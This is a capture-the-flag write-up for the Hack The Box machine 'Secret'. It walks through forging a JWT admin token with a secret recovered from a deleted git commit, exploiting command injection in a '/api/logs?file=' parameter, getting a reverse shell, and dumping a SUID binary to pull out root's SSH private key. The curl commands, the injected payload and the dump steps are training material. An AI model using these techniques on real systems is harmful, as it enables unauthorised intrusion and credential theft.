Secret Hackthebox writeup
In this Box we are going to follow documentation instructions to create a new user , will face sensitive data exposure will let us see a delete commit ,this will help us change our token to the admin token and login as admin , reading source codes we find a command injection so we will have a reverse shell as a user, for the root part there is a suid binary that can read any file on the system and count it , and in the source code it has PR_SET_DUMPABLE so we can dump it if it receives a signal while running ,we will send segmentation fault signal and dump the process then performing strings on the dump we can read the root ssh private key and login as root
Scanning :
nmap -A -T4 10.10.11.120 -oN nmap.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumerating :
we can Follow the documentation guide to register a user :
so we can try :
curl -X POST http://10.10.11.120/api/user/register -H 'Content-Type: application/json' -d '{"name": "MESBAHA","email": "test@testers.com","password": "hecker"}'
and this is the expected response for a successful registration as we see in the Documentation
now we want to login with this user , we can check the documentation :
curl -X POST http://10.10.11.120/api/user/login -H 'Content-Type: application/json' -d '{"email": "test@testers.com","password": "hecker"}'
and this means we login successfully as documentation tells us :
now we can also see we can try access private route :
providing our token in the host header and making a get request :
curl -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNlZGEzZTQ0NWI1YzA0NWM2MzRlMTgiLCJuYW1lIjoiTUVTQkFIQSIsImVtYWlsIjoidGVzdEB0ZXN0ZXJzLmNvbSIsImlhdCI6MTY0ODI4NjQ1MH0.qw4zy4hLWs95jH4y09sEcgOFPxDtOEWaw9Xv_E5ZpOg" http://10.10.11.120/api/priv
so now we want to elevate to admin , we need to provide the admin token to login as admin rule.
we can see at the main page we can download the source-codes
maybe downloading the source codes can reveal more information to us
wget http://10.10.11.120/download/files.zip
unzip files.zip
and we can see it is a git repository , we can check the logs to see if the owner deleted something recently.
git log
and this log seems interesting , if we read the current .env
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret
it contains the environment variables , there are very common mistakes can happen at this file like providing username and password at the connect variable or releasing secret tokens.
we can follow this path and see the previous version of .env
git show 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
now we have the secret , we can go to jwt.io providing our token and the secret we can modify the name to admin.
if we change it to admin it won’t work , back to the Documnetation we will see admin name is “theadmin”
now moidify our token :
we can now use this token to request the /priv again
curl -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNlZGEzZTQ0NWI1YzA0NWM2MzRlMTgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdGVycy5jb20iLCJpYXQiOjE2NDgyODY0NTB9.V0Sp_hlU1cYAZ_tYZ3_vHJuQ2saLfoiaxPrzZssD2-E" http://10.10.11.120/api/priv
now what 😂?
we can check the source code for the private route under local-web/routes/private.js
if we make a get request as admin to /logs with parameter file it will execute command :
git log --oneline ${file}
we can try see if it works :
and it is working , we can try some command injection here :
curl -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNlZGEzZTQ0NWI1YzA0NWM2MzRlMTgiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRlc3RAdGVzdGVycy5jb20iLCJpYXQiOjE2NDgyODY0NTB9.V0Sp_hlU1cYAZ_tYZ3_vHJuQ2saLfoiaxPrzZssD2-E" "http://10.10.11.120/api/logs?file=index.js;id"
Foothold:
Hence we have command injection we can now try to get a reverse shell .
the nc mkfifo payload works fine , at revshells.com, but make sure you url-encoded it , i have used this
now we are in :
Privilege escalation :
using Linpeas or Just manual navigating in the system you will find under /opt
and this binary has the suid bit which we can try to abuse
-rwsr-xr-x 1 root root 17824 Oct 7 10:03 count
if we try to run the program we can see it just counts the content in a file
Analyzing the code
we can see the file we supply will be loaded , then the function will count it line by line and word by word,..etc
we can also see this comment and this code line :
this seems irregular to me
prctl(PR_SET_DUMPABLE, 1);
checking prctl() manual here we can find :
hence it is set to 1 in our case this means we can dump it if it receives a signal like “interrupt” while it is running
so we will get another reverse shell on another port
in shell-1 : run the binary and specify the file you want
in shell-2 : kill the process ex: kill -SIGSEGV 1718
now as we have dumped it where is the dumps ? , reading here it should be at /var/crash
shell -1 :
shell -2 :
get PID from the ps aux command
and we see our dump :
reading here to know what to do with a .crash file
apport-unpack _opt_count.1000.crash /tmp/dumps
now perform strings on CoreDump
Root Access
Hence we Have port 22 open ,now save the id_rsa and :
chmod 600 id_rsa
ssh root@10.10.11.120 -i id_rsa
